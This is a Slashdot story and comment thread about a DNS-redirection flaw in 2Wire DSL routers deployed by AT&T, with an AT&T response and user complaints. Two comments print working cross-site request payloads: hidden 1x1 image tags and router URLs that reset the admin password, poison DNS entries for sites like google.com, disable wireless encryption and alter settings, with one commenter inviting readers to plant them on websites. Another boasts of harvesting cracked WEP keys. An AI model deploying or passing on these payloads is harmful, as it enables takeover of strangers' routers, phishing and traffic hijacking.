AT&T, 2Wire Ignoring Active Security Exploit [Updated]

An anonymous reader writes "2Wire manufactures DSL modems and routers for AT&T and other major carriers. Their devices suffer from a DNS redirection vulnerability that can be used as part of a variety of attacks, including phishing, identity theft, and denial of service. This exploit was publicly reported more than eight months ago and applies to nearly all 2Wire firmware revisions. The exploit itself is trivial to implement, requiring the attacker only to embed a specially crafted URL into a Web site or email. User interaction is not required, as the URL may be embedded as an image that loads automatically with the requested content. The 2Wire exploit bypasses any password set on the modem/router and is being actively exploited in the wild. AT&T has been deploying 2Wire DSL modems and router/gateways for years, so there exists a large vulnerable installed base. So far, AT&T/2Wire haven't done anything about this exploit." Update: 04/09 17:48 GMT by KD : AT&T spokesman Seth Bloom sends word that AT&T has not been ignoring the problem. According to Bloom: "The majority of our customers did not have gateways affected by this vulnerability. For those that did, as soon as we became aware of the issue, we expeditiously implemented a permanent solution to close the vulnerability. In fact, we've already updated the majority of affected 2Wire gateways, and we're nearing completion of the process. We've received no reports of any significant threats targeting our customers."

OK, now we all know

[hyades1]

What's these bastards' excuse for standing around with their thumb up their bum for eight months while people get their lives turned inside out?

I smell lawsuits. Many, many lawsuits.

I'm not suprised, given my experience with 2wire

[krovisser]

One of the worst routers I have ever had. Besides resetting itself arbitrarily, it would forget it's own settings and revert to the default, or half of the settings would revert to the default and the other half.... ? Also, right before I threw it out my window, it forgot it was a wireless router completely. I mean, it reset itself one last time and quit broadcasting completely. Even the setup pages lost the wireless part. I could manually enter in the wireless setup URL, and it would show one with random values in each field.

I'm just waiting for a nice cooler day to take it to the shooting range. The manual traps and some shotgun pellets might make up for all my anguish.

Re:I'm just glad...

[value_added]

I still have my old Speedstream 5100b. :)

I'm not sure I get the joke, but if it's funny, it might be even funnier that, IIRC, I have a model with a lower number. With the exception that it doesn't reset/resync after a power failure, I guess it works likes it's supposed to.

On the other hand, I am concerned that should the little bugger fail, I'll have to purchase a newer model. Which means I'll end up with something with a metric ton of unwanted features.

I know this isn't Ask Slashdot, but does anyone know whether it's possible to acquire, either through one's own DSL provider or elsewhere, a modem that's just a modem? Or is that just not possible these days? And maybe someone more knowledgable than the rest of us can comment on whether it's possible to "connect" to the thing in some way to read it's configuration.

Large install base

[Verteiron]

I can detect 4 of these routers from inside my house, all using the SSID 2WIRE. There must be tens of thousands of these things out there, the vast majority running the default, unsecured configuration...

2Wire routers also very weak on WEP

[Jeffrey Baker]

2Wire access points also come hard-coded for 56-bit WEP, which can be cracked in seconds. I have a list of hundreds of WEP keys I got just from riding my bicycle around San Francisco with a laptop chugging away in my backpack. These are by far the worst access points ever deployed, and they are, sadly, also the most widely deployed in the USA.

If you have a website, paste the following code

[BlueUnderwear]

Thanks so much for that URL.

If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):

<img src="http://192.168.1.254/xslt?PAGE=H04_POST&amp;PASSWORD=admin&amp;PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>

Re:2Wire routers also very weak on WEP

[Jeffrey Baker]

Well, the 2Wire is the box the telco sends you when you order an ADSL line, so your average ignorant consumerbot has no reason to get anything else.

Re:Exploit doesn't seem to work on my 2700HG-B

[Clueless Moron]

I'm sure that if I was already logged into my router, that link would work, because I know the 2wire uses cookie based authentication.

But why on earth would I be logged into it??? Its status pages do not require a login, so the only reason to log in would be to change something, which happens maybe once a year. And the session times out after a few minutes.

TFS (The Fine Summary) says "the 2Wire exploit bypasses any password set on the modem/router" which is blatantly false: apparently it works only if you happen to have logged into an admin page on the router within the past few minutes, which is remarkably unlikely.

My guess is that the "exploit" is fundamentally relying on people not having changed the default router password. That way, the initial URL to set the password will work, and after that the router is pwn3d.

Moral? Set your stupid default router password. Just like with any router.

Re:from the DSL reports forums

[Some_Llama]

you don't need a script, just add this link to your webpage and force people to execute it on load:

http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS [192.168.1.254]

you can change the commands to do a number of different actions (pretty much any configuration change on any page in the router)

eg:

Add names to the DNS:
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1 [192.168.1.254]

Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0 [192.168.1.254]

Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE [192.168.1.254]

you can also change the 192.168.1.254 to say "home" or "gateway.2wire.net"

eg:
Set Dynamic DNS
http://gateway.2wire.net/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE [2wire.net]

Re:I'm just glad...

[houstonbofh]

I got a brand new speedstream 4100 with my AT&T DSL connection 8 months ago. I just had to say at least 6 times, "Yes I really do want just a modem. No I do not want a 2wire. Yes I know what I am saying. Yes I know it is free with the rebate. No I still don't want it." I also had to lie and say I was using Windows just to get my DLS turned on. I guess it like for me to talk dirty...